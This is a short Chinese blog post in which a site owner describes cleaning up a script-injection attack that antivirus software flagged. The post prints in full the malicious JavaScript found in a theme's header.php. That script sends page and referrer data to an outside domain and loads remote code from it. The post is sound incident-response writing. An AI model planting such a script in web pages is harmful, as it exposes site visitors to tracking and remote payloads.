SEP提示Mass Injection Website 19处理

今天访问自己网站时SEP提示[SID: 28821] 已禁止 Web Attack: Mass Injection Website 19 攻击。 已禁止此应用程序的通信: C:PROGRAM FILES (X86)MOZILLA FIREFOXFIREFOX.EXE,然后就禁止访问网站,客户端将禁止来自 IP 地址x.x.x.x的通信 (于接下来的 600 秒,即从 2016/1/28 9:15:24 到 2016/1/28 9:25:24)。

到SEP管理查询了下相关的信息,说是脚本注入。

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28821

然后登陆到VPS上检查最近被修改的文件

find -ctime -1 检查最近1天被修改的文件

发现除了cache和sitemap之外只有一个主题下的header.php文件被修改。

打开这个文件和之前备份对比,发现在每个</head>之前都被加了一行代码

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://theclassicalfourplus1.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

删除这行代码,并将header.php文件权限设定为444。

至于问题基本解决。

0 回复

发表评论

Want to join the discussion?
Feel free to contribute!

发表评论

您的电子邮箱地址不会被公开。